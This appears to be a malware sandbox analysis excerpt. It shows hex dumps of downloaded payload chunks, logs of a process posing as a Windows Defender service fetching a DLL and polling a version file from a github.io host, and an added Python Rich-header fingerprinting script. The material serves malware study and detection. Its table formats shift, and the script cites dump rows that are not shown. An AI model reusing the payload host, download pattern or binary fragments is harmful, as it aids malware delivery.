                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 99 92 91 85 23 3c 86 47 2e 53 32 05 3e 87 e7 56 64 e4 72 24 40 88 c9 94 8c 5c a6 42 89 ab 99 92 91 cb 44 8a 8d 46 2e 53 32 72 8b 6f 48 8c c8 65 4a 46 51 4a 8d 19 b9 4c c9 33 4c 8e 15 92 23 97 29 4e 8f f7 55 53 32 72 39 50 90 d9 52 bd 2d 37 42 81 54 37 cf 8c 03 99 e4 4b d7 90 0c 58 9a 42 13 c8 90 0c ba e7 70 13 1f 9a 13 df 2c 22 01 2c 35 5e cc 7f 2b 72 01 7b 2f 5c 2e f6 5d 74 5b d5 2b 76 d4 c5 72 e9 85 78 01 ff 2f 5e ec 03 de 7a 16 bb da 8b d3 33 7c 01 62 cf d0 d5 29 7e 22 d2 29 06 b6 fc f0 80 01 6f 2b 54 33 82 72 64 4a 46 13 84 fb 53 32 25 23 47 86 e3 88 25 23 53 32 cb 8a b3 23 53 32 32 8c 9b 8e 83 f0 5a 37 25 90 16 b0 92 01 65 90 2a d6 5d d8 5c 9b e0 96 c6 09 e1 6a ba de d2 3d 57 57 c0 33 5f 54 09 64 9e 57 6c 55 74 1e 84 06 94 a4 37 5e eb a4 82 b4 04 bc
                                                                                                    Data Ascii: #<G.S2>Vdr$@\BDF.S2roHeJFQJL3L#)NUS2r9PR-7BT7KXBp,",5^+r{/\.]t[+vrx/^z3|b)~")o+T3rdJFS2%#G%#S2#S22Z7%e*]\j=WW3_TdWlUt7^
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 04 0a 16 4e 04 84 3a 58 bc ee cf 1b 8b 2b 44 8d 82 1b 44 2a 54 ed e1 e0 ae 8d 8f 60 0c 10 e1 c4 03 6f d3 8e 1c c8 1e 03 42 f0 69 05 d2 9a 4a c0 fc 90 ef cf 81 50 09 e0 d1 91 27 00 07 13 df 74 9e 9a ad 15 81 7c 92 f0 55 ae ac bc b4 b8 00 fc 00 05 35 b6 04 3b a8 a5 46 f0 b5 04 93 55 d0 a5 f5 26 fc 33 c9 ff 15 59 86 69 6b fd 04 26 19 ad c1 69 38 e4 cc 58 c0 ff ff b1 43 b2 54 41 b0 40 41 b1 45 41 b2 5d b3 56 40 b7 53 9b 61 2c e0 8a c3 ae 8c 10 c0 41 3c 4f fb ed 32 c3 88 4c 71 41 8d 43 01 30 0e 72 02 73 f3 3c cf f3 03 74 04 75 05 cf f3 3c cf 76 06 77 07 78 08 3c cf f3 3c 79 09 7a 0a 7b f3 3c cf f3 0b 7c 0c 7d 0d bf ff 3c cf 7e 0e 7f 0f 32 c8 88 4d 80 10 10 32 d0 a6 79 ff e7 88 55 81 11 44 32 c0 44 88 45 82 14 12 c8 ff d9 34 cf 4d 83 13 d0 55 84 14 32 d8 88 5d
                                                                                                    Data Ascii: N:X+DD*T`oBiJP't|U5;FU&3Yik&i8XCTA@AEA]V@Sa,A<O2LqAC0rs<tu<vwx<<yz{<|}<~2M2yUD2DE4MU2]
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 73 cf 12 1e 88 13 56 d0 7b 83 21 36 60 94 14 bd 84 13 01 81 f6 3d 7c 68 22 e0 3e 7d 06 69 b8 59 b8 f7 b7 da f4 12 d9 d1 d3 d8 04 78 cd 0a c1 38 cd c0 93 14 c6 ad b2 76 cd 55 c6 cb 14 76 81 9d 63 28 15 3e b0 03 80 22 02 a3 52 b4 97 ef b4 38 ac b0 b5 d8 75 3b 22 82 5f bb cb a6 bc b3 d8 74 0c 3c 7a c9 68 a5 4d be 69 b3 71 21 5b 68 1d 5d c3 24 e0 4d 47 37 8b c4 e0 0a 01 bd 76 55 81 c4 37 5d e7 5f 7b bb 87 89 0d 1e b3 15 20 0a 44 c0 25 0c 83 f9 b2 6d 77 ed 02 75 0c a8 06 14 01 eb 14 16 fa d7 c1 1a 6c b8 dd 34 04 74 1b 08 01 74 16 c0 72 b7 23 f0 6c fb 9a e1 32 ae 0e 64 1a eb 0a 52 dc d7 6b ac bb cb 83 72 f9 d7 ba 0d ff 25 83 a0 4b 48 c0 3c 5f 81 05 b0 e0 e0 45 fb b4 fc b9 03 6e f7 3e 02 97 75 2c 68 ac 9f 15 8e 58 81 e1 bd d3 16 84 43 39 4a a2 80 54 24 e0 c4 7c
                                                                                                    Data Ascii: sV{!6`=|h">}iYx8vUvc(>"R8u;"_t<zhMiq![h]$MG7vU7]_{ D%mwul4ttr#l2dRkr%KH<_En>u,hXC9JT$|
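Every payload fetched in these sessions starts the same way: an MZ header, the stock "This program cannot be run in DOS mode." stub, and directly after it a Rich header (the "Rich" string is visible in each Data Ascii row; the bytes before it are XOR-obfuscated with the dword that follows "Rich"). The Rich header is written by the Microsoft linker and lists the product ID and build number of every toolchain component that contributed objects, so it is a useful pivot: the XOR key is a checksum over the DOS header and the entries, a mismatch means the header was spoofed or patched, and two files that decode to the same set of (product ID, build) pairs were almost certainly linked with the same toolchain. The script below is an added example written for this report, not Joe Sandbox output and not code from the sample's author. It transcribes the DOS header, stub and Rich block from two of the Data Raw rows on this page (the MZ chunk at the top of this section and the first chunk of AnyDeskUpdateService.exe); because the report truncates both dumps, the zero fill up to e_lfanew and the "PE\0\0" signature after it are assumed continuations, and no attempt is made to map build numbers to compiler versions.

```python
import struct

DANS = 0x536E6144  # "DanS" read as a little-endian dword
RICH = b"Rich"
MASK = 0xFFFFFFFF


def rol32(value, shift):
    """32-bit rotate left, the primitive the linker uses for the Rich checksum."""
    shift &= 31
    value &= MASK
    return ((value << shift) | (value >> (32 - shift))) & MASK


def raw_from_report(line):
    """Recover the bytes from a Joe Sandbox 'Data Raw:' row (space-separated hex)."""
    idx = line.find("Data Raw:")
    if idx < 0:
        raise ValueError("not a Data Raw row")
    return bytes.fromhex(line[idx + len("Data Raw:"):])


def parse_rich_header(data):
    """Locate, decode and checksum the Rich header of an MZ image (None if absent)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew < 0x40 or e_lfanew > len(data):
        raise ValueError("e_lfanew out of range")
    rich_off = data.rfind(RICH, 0x40, e_lfanew)
    if rich_off < 0 or rich_off + 8 > e_lfanew:
        return None
    key = struct.unpack_from("<I", data, rich_off + 4)[0]
    # Walk back one dword at a time until the XOR-decoded value reads "DanS".
    dans_off = rich_off - 4
    while dans_off >= 0x40 and struct.unpack_from("<I", data, dans_off)[0] ^ key != DANS:
        dans_off -= 4
    if dans_off < 0x40 or (rich_off - dans_off - 16) % 8:
        return None
    # After DanS and three key-padding dwords come (prodid<<16 | build, count) pairs.
    entries = []
    for off in range(dans_off + 16, rich_off, 8):
        comp_id, count = struct.unpack_from("<II", data, off)
        entries.append(((comp_id ^ key) >> 16, (comp_id ^ key) & 0xFFFF, count ^ key))
    # The key is a checksum: DanS offset + every DOS header/stub byte rotated by its
    # offset (e_lfanew skipped) + every comp_id rotated by its object count.
    csum = dans_off
    for i in range(dans_off):
        if not 0x3C <= i < 0x40:
            csum = (csum + rol32(data[i], i)) & MASK
    for prod_id, build, count in entries:
        csum = (csum + rol32((prod_id << 16) | build, count)) & MASK
    return {"key": key, "e_lfanew": e_lfanew, "dans_offset": dans_off,
            "rich_offset": rich_off, "entries": entries, "checksum_ok": csum == key}


def toolchain_fingerprint(info):
    """(prodid, build) pairs without object counts: stable across builds of one toolchain."""
    return frozenset((p, b) for p, b, _ in info["entries"])


# Constructed samples: DOS header, stub and Rich block transcribed from the two
# "Data Raw" dumps on this page (the section's first MZ chunk and the first chunk
# of AnyDeskUpdateService.exe). The report truncates both dumps, so the zero fill
# up to e_lfanew and the "PE\0\0" signature after it are assumed, not captured.
STUB = (bytes.fromhex("0e1fba0e 00b409cd 21b8014c cd21")
        + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7))


def mz_image(e_lfanew, rich_block):
    header = (bytes.fromhex("4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000")
              + bytes(0x3C - 0x1C) + e_lfanew.to_bytes(4, "little"))
    body = header + STUB + rich_block
    return body + bytes(e_lfanew - len(body)) + b"PE\x00\x00"


RICH_FIRST = bytes.fromhex("""
fc e2 01 37 b8 83 6f 64 b8 83 6f 64 b8 83 6f 64 f3 fb 6c 65 bd 83 6f 64
f3 fb 6a 65 0e 83 6f 64 f3 fb 6b 65 a8 83 6f 64 a8 07 6c 65 b2 83 6f 64
a8 07 6b 65 a9 83 6f 64 a8 07 6a 65 ea 83 6f 64 f3 fb 6e 65 b1 83 6f 64
b8 83 6e 64 c3 83 6f 64 f0 06 66 65 b9 83 6f 64 f0 06 90 64 b9 83 6f 64
b8 83 f8 64 b9 83 6f 64 f0 06 6d 65 b9 83 6f 64 52 69 63 68 b8 83 6f 64""")
RICH_UPDATER = bytes.fromhex("""
83 5c ce c7 c7 3d a0 94 c7 3d a0 94 c7 3d a0 94 8c 45 a3 95 c2 3d a0 94
8c 45 a5 95 7f 3d a0 94 8c 45 a4 95 d7 3d a0 94 d7 b9 a3 95 cd 3d a0 94
d7 b9 a4 95 d6 3d a0 94 d7 b9 a5 95 96 3d a0 94 8c 45 a1 95 ce 3d a0 94
c7 3d a1 94 43 3d a0 94 8f b8 a9 95 c6 3d a0 94 8f b8 5f 94 c6 3d a0 94
c7 3d 37 94 c6 3d a0 94 8f b8 a2 95 c6 3d a0 94 52 69 63 68 c7 3d a0 94""")
SAMPLE_FIRST = mz_image(0x110, RICH_FIRST)
SAMPLE_UPDATER = mz_image(0x100, RICH_UPDATER)

if __name__ == "__main__":
    row = "2024-09-29 00:26:10 UTC1378INData Raw: " + SAMPLE_UPDATER.hex(" ")
    for name, image in (("first chunk", SAMPLE_FIRST),
                        ("AnyDeskUpdateService.exe", raw_from_report(row))):
        info = parse_rich_header(image)
        print(f"{name}: key=0x{info['key']:08x} checksum_ok={info['checksum_ok']}")
        for prod_id, build, count in info["entries"]:
            print(f"  prodid=0x{prod_id:04x} build={build:5d} objects={count}")
    same = (toolchain_fingerprint(parse_rich_header(SAMPLE_FIRST))
            == toolchain_fingerprint(parse_rich_header(SAMPLE_UPDATER)))
    print("same toolchain fingerprint:", same)
```

Run as-is (Python 3.8 or later for `bytes.hex(" ")`), or feed any full Data Raw row from the report to `raw_from_report` and then to `parse_rich_header`. For both chunks the recomputed checksum equals the stored key, so the Rich headers are intact rather than copied in from another binary, and the two files decode to the same twelve (product ID, build) pairs while differing only in object counts: the dropper's earlier download and AnyDeskUpdateService.exe were linked with the same toolchain, which is the kind of pivot worth carrying into a YARA rule or a cluster query alongside the file hashes.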


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49717 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:10 UTC | 77 | OUT | GET /file/AnyDeskShellIntegration.dll HTTP/1.1
Host: duy-thanh.github.io
2024-09-29 00:26:11 UTC | 757 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 54784
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-d600"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:11 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 7470:11D1CA:291C61D:2DED7D8:66F89EA2
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:11 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740049-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569571.017791,VS0,VE21
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 28491f51a49b73e41d58b986cb30543cadff6f25


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.6  49721        185.199.110.153  443               2128  C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-29 00:26:17 UTC  61                 OUT        GET /file/version.txt HTTP/1.1
                                                       Host: duy-thanh.github.io
2024-09-29 00:26:17 UTC  732                IN         HTTP/1.1 200 OK
                                                       Connection: close
                                                       Content-Length: 18
                                                       Server: GitHub.com
                                                       Content-Type: text/plain; charset=utf-8
                                                       permissions-policy: interest-cohort=()
                                                       Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                       Access-Control-Allow-Origin: *
                                                       Strict-Transport-Security: max-age=31556952
                                                       ETag: "66e38c97-12"
                                                       expires: Sun, 29 Sep 2024 00:36:17 GMT
                                                       Cache-Control: max-age=600
                                                       x-proxy-cache: MISS
                                                       X-GitHub-Request-Id: 9139:1C52C8:26F8EF8:2B104B9:66F89EA8
                                                       Accept-Ranges: bytes
                                                       Age: 0
                                                       Date: Sun, 29 Sep 2024 00:26:17 GMT
                                                       Via: 1.1 varnish
                                                       X-Served-By: cache-nyc-kteb1890048-NYC
                                                       X-Cache: MISS
                                                       X-Cache-Hits: 0
                                                       X-Timer: S1727569578.623912,VS0,VE17
                                                       Vary: Accept-Encoding
                                                       X-Fastly-Request-ID: 5465b0cae81f53faab8a5b16b412c67df8931220
2024-09-29 00:26:17 UTC  18                 IN         Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                       Data Ascii: version=20240913


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.6  49724        185.199.110.153  443               2128  C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-29 00:26:24 UTC  61                 OUT        GET /file/version.txt HTTP/1.1
                                                       Host: duy-thanh.github.io
2024-09-29 00:26:24 UTC  752                IN         HTTP/1.1 200 OK
                                                       Connection: close
                                                       Content-Length: 18
                                                       Server: GitHub.com
                                                       Content-Type: text/plain; charset=utf-8
                                                       permissions-policy: interest-cohort=()
                                                       x-origin-cache: HIT
                                                       Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                       Access-Control-Allow-Origin: *
                                                       Strict-Transport-Security: max-age=31556952
                                                       ETag: "66e38c97-12"
                                                       expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                       Cache-Control: max-age=600
                                                       x-proxy-cache: MISS
                                                       X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                       Accept-Ranges: bytes
                                                       Date: Sun, 29 Sep 2024 00:26:24 GMT
                                                       Via: 1.1 varnish
                                                       Age: 15
                                                       X-Served-By: cache-ewr-kewr1740075-EWR
                                                       X-Cache: HIT
                                                       X-Cache-Hits: 1
                                                       X-Timer: S1727569585.674287,VS0,VE1
                                                       Vary: Accept-Encoding
                                                       X-Fastly-Request-ID: 2a8a999cf039af73ede26400d4de8698ccc5bb29
2024-09-29 00:26:24 UTC  18                 IN         Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                       Data Ascii: version=20240913


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.6  49725        185.199.110.153  443               2128  C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-29 00:26:31 UTC  61                 OUT        GET /file/version.txt HTTP/1.1
                                                       Host: duy-thanh.github.io
2024-09-29 00:26:31 UTC  752                IN         HTTP/1.1 200 OK
                                                       Connection: close
                                                       Content-Length: 18
                                                       Server: GitHub.com
                                                       Content-Type: text/plain; charset=utf-8
                                                       permissions-policy: interest-cohort=()
                                                       x-origin-cache: HIT
                                                       Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                       Access-Control-Allow-Origin: *
                                                       Strict-Transport-Security: max-age=31556952
                                                       ETag: "66e38c97-12"
                                                       expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                       Cache-Control: max-age=600
                                                       x-proxy-cache: MISS
                                                       X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                       Accept-Ranges: bytes
                                                       Date: Sun, 29 Sep 2024 00:26:31 GMT
                                                       Via: 1.1 varnish
                                                       Age: 22
                                                       X-Served-By: cache-ewr-kewr1740076-EWR
                                                       X-Cache: HIT
                                                       X-Cache-Hits: 1
                                                       X-Timer: S1727569591.168550,VS0,VE1
                                                       Vary: Accept-Encoding
                                                       X-Fastly-Request-ID: f79995bf2da94dd4c690d85d123da043dd5fa263
2024-09-29 00:26:31 UTC  18                 IN         Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                       Data Ascii: version=20240913


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
9           192.168.2.6  49726        185.199.110.153  443               2128  C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-29 00:26:37 UTC  61                 OUT        GET /file/version.txt HTTP/1.1
                                                       Host: duy-thanh.github.io
2024-09-29 00:26:37 UTC  752                IN         HTTP/1.1 200 OK
                                                       Connection: close
                                                       Content-Length: 18
                                                       Server: GitHub.com
                                                       Content-Type: text/plain; charset=utf-8
                                                       permissions-policy: interest-cohort=()
                                                       x-origin-cache: HIT
                                                       Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                       Access-Control-Allow-Origin: *
                                                       Strict-Transport-Security: max-age=31556952
                                                       ETag: "66e38c97-12"
                                                       expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                       Cache-Control: max-age=600
                                                       x-proxy-cache: MISS
                                                       X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                       Accept-Ranges: bytes
                                                       Date: Sun, 29 Sep 2024 00:26:37 GMT
                                                       Via: 1.1 varnish
                                                       Age: 28
                                                       X-Served-By: cache-ewr-kewr1740067-EWR
                                                       X-Cache: HIT
                                                       X-Cache-Hits: 1
                                                       X-Timer: S1727569598.628852,VS0,VE2
                                                       Vary: Accept-Encoding
                                                       X-Fastly-Request-ID: c7c79f1c9c0b048471508cd25718c5ee52aa9709
2024-09-29 00:26:37 UTC  18                 IN         Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                       Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49728 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:43 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:26:43 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:26:43 GMT
    Via: 1.1 varnish
    Age: 34
    X-Served-By: cache-ewr-kewr1740071-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569604.955411,VS0,VE2
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 72638f50b0bbf5bd4b95bf6a6a13ac8c01f40a60
2024-09-29 00:26:43 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49729 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:50 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:26:50 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:26:50 GMT
    Via: 1.1 varnish
    Age: 41
    X-Served-By: cache-ewr-kewr1740054-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569611.502516,VS0,VE2
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 710eb6f73d5abd90d10b40cc107c24382c0a293c
2024-09-29 00:26:50 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49731 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:56 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:26:56 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:26:56 GMT
    Via: 1.1 varnish
    Age: 47
    X-Served-By: cache-ewr-kewr1740077-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569616.464132,VS0,VE2
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 4955c39072255e44ced38f0c8faac763a0b0defd
2024-09-29 00:26:56 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49733 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:27:02 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:27:02 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:27:02 GMT
    Via: 1.1 varnish
    Age: 53
    X-Served-By: cache-ewr-kewr1740029-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569622.453607,VS0,VE2
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 76c80132655812298931b58c56118a7a6d10804b
2024-09-29 00:27:02 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49734 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:27:08 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:27:08 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:27:08 GMT
    Via: 1.1 varnish
    Age: 59
    X-Served-By: cache-ewr-kewr1740032-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569628.415826,VS0,VE2
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 25ed5a18390a0d256320adcfd47779d801ceb01b
2024-09-29 00:27:08 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49735 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:27:14 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:27:14 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:27:14 GMT
    Via: 1.1 varnish
    Age: 65
    X-Served-By: cache-ewr-kewr1740050-EWR
    X-Cache: HIT
    X-Cache-Hits: 9
    X-Timer: S1727569634.408812,VS0,VE0
    Vary: Accept-Encoding
    X-Fastly-Request-ID: b14100ae6737e5c0198733870b0e5bf9b4bbb920
2024-09-29 00:27:14 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49736 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:27:20 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
2024-09-29 00:27:20 UTC | 752 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 18
    Server: GitHub.com
    Content-Type: text/plain; charset=utf-8
    permissions-policy: interest-cohort=()
    x-origin-cache: HIT
    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "66e38c97-12"
    expires: Sun, 29 Sep 2024 00:36:09 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
    Accept-Ranges: bytes
    Date: Sun, 29 Sep 2024 00:27:20 GMT
    Via: 1.1 varnish
    Age: 71
    X-Served-By: cache-ewr-kewr1740055-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1727569640.421463,VS0,VE3
    Vary: Accept-Encoding
    X-Fastly-Request-ID: cb3d330bea8236e279c45386b8d41750e4a3a0b9
2024-09-29 00:27:20 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
    Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49737 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:27:26 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
    Host: duy-thanh.github.io
